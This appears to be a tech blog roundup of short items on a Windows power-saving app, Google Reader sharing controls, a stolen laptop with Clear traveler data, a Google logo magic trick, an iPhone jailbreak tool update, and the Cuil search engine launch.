Edison Makes Your PC Go Green

Windows only: Free system tray application Edison helps save energy and money by tweaking your PC's power settings on a schedule. Edison allows you to set different energy preferences for work and non-work time, then choose the times you want each profile to run. The power settings determine how long your PC should wait before turning off the display, powering down your hard drive, and suspending your computer. After you set your preferences, Edison also estimates your yearly savings in terms of money, energy, and CO2 emissions. Edison is freeware, requires .NET 2.0 and an email address for registration. Google Reader Lets You Pick Your Friends

If you were one of many people who were upset when Google Reader began automatically displaying your shared items to all of your contacts in Gmail Chat, this one's for you: Google Reader now allows users to selectively choose who to share with.
It's a nice improvement, especially considering the only way to unshare with someone before was to remove them entirely from your contact list. Thanks alaysias!

Laptop containing 33,000 Clear users information stolen

Security 101: Never put unencrypted sensitive information on a laptop and expect that it's safe. Especially if you are the TSA. Recently, the TSA announced that a laptop was stolen from San Francisco International Airport containing "pre-enrollment records of approximately 33,000 customers" for the Clear Trusted Traveler Program. For $100 per year, the Clear Program enables travelers to get through airport security faster by showing TSA officers their Clear Registered Traveler Card and going through a special security line. While this program has no doubt saved many people valuable time getting through security, there are about 33,000 people who are now asking the question "Who has my personal information?"

Magic Trick With Google

Here’s a magic trick to surprise friends with; go to the flash-based fake Google homepage by Dark Arts Media. Ask someone casually to watch the Google logo; don’t announce you’re about to perform a magic trick. Now click anywhere on the page while pointing at the logo with the other hand, and then move two of your fingers to completely cover the the “o"s in the Google logo. When you remove the fingers, hopefully to much surprise, the letters “o” will be missing from the logo.

Now ask the visitor to move her fingers over the missing “o"s, and click on the page again. After your friend removes the fingers, the logo will be complete again.

The trick here? Whenever you click on the page, the letters will disappear after five seconds. Clicking again will make them reappear after five seconds. (A third click, by the way, will change the page to an actual Google homepage so you can perform searches then.) If you successfully perform this trick, let us know!

New iPhone Unlock Tool Out, Fixes Bugs

If you had trouble jailbreaking and unlocking your iPhone 2.0 with Pwnage 2.0, there's a new version out there that will make it even easier to free your iPhone, fixing some of the problems which were found in the previous version:

- It auto-finds the bl39 and bl46 files better, if they’re on your computer.
- It creates the ~/Library/iTunes/Device Support/ folder if not present, which should help with some 1600 errors people have been having.
- Many people have reported the PwnageTool not starting up at all (the icon never stops bouncing). This issue should be resolved now.
- The Sparkle AppCast URL is fixed in this version, so automatic updates should work for future releases.

Cuil Search Engine Out to Challenge Google

Ex-Google employees unveil a new search engine today out to challenge their former employer: Cuil, pronounced "cool," launches with 120 billion web pages in its index. My initial tests show that Cuil's results aren't quite as impressive as the size of the index, but they're pretty good. From Cuil's search for Zanharjabir yields decent results (though with bizarre images) and an "Explore by category" module on the upper right, which offers related searches. This category list is perhaps the biggest indicator of Cuil's smarts; for Zanharjabir it offers searches for Gawker Media (our publisher), Blogs, Google Services, American bloggers—all spot-on—and one miss, Video Game magazine.
